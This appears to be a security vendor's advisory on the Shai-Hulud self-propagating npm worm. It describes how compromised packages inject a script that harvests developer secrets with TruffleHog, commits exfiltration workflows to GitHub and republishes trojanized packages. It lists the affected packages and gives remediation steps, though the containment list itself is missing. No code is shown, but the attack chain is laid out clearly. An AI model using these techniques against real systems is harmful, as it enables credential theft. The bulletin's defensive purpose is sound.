Cyber security researchers have flagged a fresh software supply chain attack targeting the NPM (NPM is one of the world's largest software registries, and the package manager for Node.js projects) registry that has affected more than 40 packages that belong to multiple maintainers.
"The compromised versions include a function (NpmModule.updatePackage) that downloads a package tarball, modifies package.json, injects a local script (bundle.js), repacks the archive, and republishes it, enabling automatic trojanization of downstream packages," supply chain security company Socket said.
The end goal of the campaign is to search developer machines for secrets using TruffleHog's credential scanner and transmit them to an external server under the attacker's control. The attack is capable of targeting both Windows and Linux systems.
A cluster of malicious npm packages contain a trojanized bundle.js that runs TruffleHog to scan hosts for secrets (e.g., GITHUB_TOKEN, NPM_TOKEN, AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY). The script validates tokens (npm whoami, GitHub APIs), probes cloud metadata for short-lived credentials on build agents, and then abuses discovered developer credentials to commit a GitHub Actions workflow into .github/workflows that exfiltrates harvested secrets to a webhook.site endpoint. Because the workflow is committed to repositories, the exfiltration capability persists and can be triggered by future CI runs where secrets are available.
Security vendors describe the malware — dubbed Shai-Hulud — as a self-propagating worm: compromised npm maintainer accounts are used to publish new malicious package versions that in turn infect downstream packages and repositories, creating cascading compromises across the npm ecosystem. The campaign’s suspected starting point is a malicious rxnt-authentication package published on 2025-09-14; the npm account techsupportrxnt is considered “Patient Zero.” Analysts found 34 compromised GitHub accounts containing a Shai-Hulud repo with a data.json holding encoded exfiltrated items, and an analysis identified 278 leaked secrets (90 from local systems, 188 via malicious workflows), with hundreds of npm packages impacted.
This attack is notable for combining credential harvesting, persistent CI-side exfiltration, and automatic propagation via maintainers’ publishing rights. Recommended immediate actions are to remove the malicious package versions, rotate all exposed tokens/keys, audit CI workflows and repository history for unauthorized .github/workflows commits, inspect maintainers’ accounts for compromise, and upgrade to verified clean releases.
The following packages have been identified as impacted by the incident@ctrl/deluge@7.2.2
|
@ctrl/golang-template@1.4.3 |
|
@ctrl/magnet-link@4.0.4 |
|
@ctrl/ngx-codemirror@7.0.2 |
|
@ctrl/ngx-csv@6.0.2 |
|
@ctrl/ngx-emoji-mart@9.2.2 |
|
@ctrl/ngx-rightclick@4.0.2 |
|
@ctrl/qbittorrent@9.7.2 |
|
@ctrl/react-adsense@2.0.2 |
|
@ctrl/shared-torrent@6.3.2 |
|
@ctrl/tinycolor@4.1.1, @4.1.2 |
|
@ctrl/torrent-file@4.1.2 |
|
@ctrl/transmission@7.3.1 |
|
@ctrl/ts-base32@4.0.2 |
|
encounter-playground@0.0.5 |
|
json-rules-engine-simplified@0.2.4, 0.2.1 |
|
koa2-swagger-ui@5.11.2, 5.11.1 |
|
@nativescript-community/gesturehandler@2.0.35 |
|
@nativescript-community/sentry 4.6.43 |
|
@nativescript-community/text@1.6.13 |
|
@nativescript-community/ui-collectionview@6.0.6 |
|
@nativescript-community/ui-drawer@0.1.30 |
|
@nativescript-community/ui-image@4.5.6 |
|
@nativescript-community/ui-material-bottomsheet@7.2.72 |
|
@nativescript-community/ui-material-core@7.2.76 |
|
@nativescript-community/ui-material-core-tabs@7.2.76 |
|
ngx-color@10.0.2 |
|
ngx-toastr@19.0.2 |
|
ngx-trend@8.0.1 |
|
react-complaint-image@0.0.35 |
|
react-jsonschema-form-conditionals@0.3.21 |
|
react-jsonschema-form-extras@1.0.4 |
|
rxnt-authentication@0.0.6 |
|
rxnt-healthchecks-nestjs@1.0.5 |
|
rxnt-kue@1.0.7 |
|
swc-plugin-component-annotate@1.9.2 |
|
@crowdstrike/commitlint@8.1.1, 8.1.2 |
|
@crowdstrike/falcon-shoelace@0.4.2 |
|
@crowdstrike/foundry-js@0.19.2 |
|
@crowdstrike/glide-core@0.34.2, 0.34.3 |
|
@crowdstrike/logscale-dashboard@1.205.2 |
|
@crowdstrike/logscale-file-editor@1.205.2 |
|
@crowdstrike/logscale-parser-edit@1.205.1, 1.205.2 |
|
@crowdstrike/logscale-search@1.205.2 |
|
@crowdstrike/tailwind-toucan-base@5.0.2 |
|
browser-webdriver-downloader@3.0.8 |
|
ember-browser-services@5.0.3 |
|
ember-headless-form-yup@1.0.1 |
|
ember-headless-form@1.1.3 |
|
ember-headless-table@2.1.6 |
|
ember-url-hash-polyfill@1.0.13 |
|
ember-velcro@2.2.2 |
|
eslint-config-crowdstrike-node@4.0.4 |
|
eslint-config-crowdstrike@11.0.3 |
|
monorepo-next@13.0.2 |
|
remark-preset-lint-crowdstrike@4.0.2 |
|
verror-extra@6.0.1 |
|
yargs-help-output@5.0.3 |
As a minimum containment measures you should:
However, overall the affected machines should be considered fully compromised. Therefore, full reinstall\reimaging is preferred.
If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively Get in touch to find out how you can protect your organisation.